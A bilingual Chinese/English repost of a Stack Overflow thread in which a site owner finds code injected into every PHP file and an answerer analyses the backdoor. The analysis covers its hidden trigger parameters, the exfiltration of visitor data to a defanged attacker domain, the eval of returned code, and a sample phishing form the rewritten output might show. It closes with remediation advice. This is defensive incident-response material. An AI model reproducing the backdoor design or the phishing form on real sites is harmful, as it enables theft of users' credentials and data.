黑客在我的 PHP 文件中添加了内容 [英] hackers have added content to my PHP files
问题描述
我的网站已被黑客关闭,浏览该网站,每个 PHP 文件的顶部都有大量其他内容.
My website has been taken down by hackers, and looking through the site there is a load of additional stuff at the top of each PHP file.
现在每个文件都以:
GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{
数据库似乎没问题,所以我很好奇,能够编辑我的文件的入口路径是什么?
The database seems to be fine, so I am curious, what is the likely path of entry to be able to edit my files?
推荐答案
漏洞利用基于设置了变量prgetxr的POST请求.
The exploit is based around a POST request with a variable prgetxr being set.
如果它没有设置(并且很可能,在网站的正常使用中,它不会)它会循环通过该 IP 哈希映射 mynetsxx,如果它发现请求 IP 在匹配的网络中这个(要了解网络",您必须了解网络的工作原理,但这些基本上都是本地人,而不是远程人),如果是,则调用 rewrioutclbkxxx.您可以通过发送 GET 请求(其中 GET 变量 showmeallpls 为真)来手动请求该函数调用.
If it isn't set (and likely, in normal use of the site, it won't be) it it cycles through that IP hash-map mynetsxx and if it finds that the requesting IP is in the network that matches this (to understand "network" you have to understand how networking works, but these are basically local guys, not remote), and if it is, it calls rewrioutclbkxxx. You can manually request that function call by sending a GET request where a GET variable showmeallpls is true.
rewrioutclbkxxx 是通过输出缓冲区开始传递的,因此它可能会在发送之前处理所有数据,但是在您的正常代码完成之后就可以了.
rewrioutclbkxxx is passed through output-buffer start, so it's likely going to screw with all the data BEFORE it's sent, but AFTER your normal code is done doing it's thing.
当心,除非您知道自己在做什么,否则下面的可能是恶意域不要走.
它将从 hxxp://airschk.com/clk 中提取数据(我已经审查了该 URL 中的 HTTP),它想要获取一堆数据,所以它发送一个包含以下内容的字符串:用户代理(即用户的浏览器)、他们的 IP 地址、他们请求的 URL、他们来自哪个页面以及 ID 代码 4dae82ac67843a194c000ca1 这可能是他们的东西已设置为识别您的服务器.
It's going to pull data from hxxp://airschk.com/clk (I've censored the HTTP in that URL), it wants to get a bunch of data, so it sends a string that contains: user-agent (ie, the user's browser), their IP address, what URL they've requested, what page they came from, and the ID code 4dae82ac67843a194c000ca1 which is likely something they've set up to identify your server.
简而言之,代码将一整套用户信息发送给 airschk,并返回一些数据.这些数据被扔进了一个 EVAL.Boom,您的网站已被破解.
So in short, the code sends a whole whack of user information off to airschk, and it returns some data. That data gets tossed into an EVAL. Boom, your site is pwn'd.
EVAL 将评估其中的任何字符串,就好像它是 php 一样.他们可以删除所有内容、编辑所有内容、更改他们想要的任何内容,甚至可能获得 shell 访问权限.你基本上是pwnt.
EVAL will evaluate any string in there as if it's php. They can delete everything, edit everything, change anything they want, perhaps even get shell access. You're basically pwnt.
现在等一下,如果我们确实将 POST 请求发送回那里怎么办?哦,鬼鬼祟祟的,他们访问了 toolbarqueries.google.com 上的一个 URL,但该 URL 试图提升该 URL 的谷歌页面排名(Blackhat SEO,你可能会因此被谷歌禁止,但在短期内,他们会获得更多点击量).
Now wait, what if we did send that POST request way back there? Oh sneaky, they've gone to a URL at toolbarqueries.google.com, but the URL tries to jack up google page rank for the URL (Blackhat SEO, you can get banned from google for this, but in the short-term they get more hits).
- 您的大量用户数据被发送给
airschk的犯罪分子. - 他们想发什么就回什么,它几乎有无限的力量来欺骗你(如果他们愿意,它会为每个用户定制)
- 他们试图以某种方式提高您的谷歌排名,让您被谷歌禁止使用.
- 要检查的后门是
prgetxr的Post请求和showmeallpls的GET请求.
- A bunch of your user data is being sent to the criminals at
airschk. - They're sending back whatever the hell they want, and it has nearly unlimited power to screw you (and it's customized to each user if they want)
- They try to boost your google rank in ways that get you prerma-banned from google.
- Back doors to check are Post requests of
prgetxrand GET requests ofshowmeallpls.
他们可能会做什么的例子
由于他们可以按需编辑文件的输出流,并且知道用户代理和 IP 地址,因此他们可能可以跟踪您的用户.假设您是一家银行,这是您的登录 HTML:
Example of what they might do
Since they can edit the output stream of your files on-demand and know the user-agent as well as IP address they probably can track your users. Lets say you're a bank, and this is your login HTML:
<form method="post" action="./login.php">
<input name="BankAccountNumber" />
<input name="Password" />
</form>
好的,输出缓冲区重写实际上可以使所有内容保持原样,并对您的用户执行此操作:
Okay, the output-buffer rewrite can actually keep everything exactly the way it is and do this to your users:
<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
<input name="CreditCardNumber" />
<input name="SocialSecurityNumber" />
<input name="FullName" />
<input name="DateOfBirth" />
<input name="HomeAddress" />
<input name="BankAccountNumber" />
<input name="Password" />
<input name="prgetxr" />
</form>
如何防止这种情况发生.
好吧,我想说你的整个服务器再也不会被信任了.从轨道上摧毁该死的东西并重新安装备份.
How to prevent this.
Well, I'd say your whole server is never to be trusted again. Nuke the damn thing from orbit and re-install a backup.
没有备份?你这人怎么回事?在您聘请某人梳理每一行代码、每条数据库记录以及安装在系统上的每一个最后一个文件后,进行备份,因为可能无处不在.清除该死的东西并安装备份.
Don't have a backup? What's wrong with you? Put a backup in place after you've hired someone to comb through every line of code, every database record, and every last file installed on your system because more exploits could be anywhere. Nuke the damn thing and install a backup.
接下来,设置 chmod 设置,以便除了网络帐户以外的任何人都无法编辑这些文件.您需要了解 Unix 安全性.
Next, set chmod settings so these files cannot be edited by anyone other than an account that is NOT the web-account. You need to understand unix security.
接下来,从服务器上运行的任何文件中删除该死的 eval (甚至可能配置 suhosin).如果您有任何依赖于它的运行代码,那么无论如何您都做错了.去掉它.你需要.
Next, remove that damn eval from any file that runs on your server (maybe even configure suhosin). If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.
创可贴措施是封锁黑客域,但这在过去 12 小时内完全没有价值,他们可以转移到其他地方,现在很可能已经这样做了.
A band-aid measure will be to block the hacker domain, but this is totally worthless past 12 hours, they can just move elsewhere, and likely have by now.
我不知道他们为此采取的攻击路径,所以这是一个完全不同的调查,并不是真正的问题.
I can't tell about the path of attack they took to do this, so that's a whole different investigation and not really a question for SO.
安全性不是微不足道的,也不是容易或快速学习的.不要玩游戏,付钱给知道自己在做什么的人.
Security isn't trivial or easy or quick to learn. Don't play games, pay someone who knows what they're doing.
这篇关于黑客在我的 PHP 文件中添加了内容的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
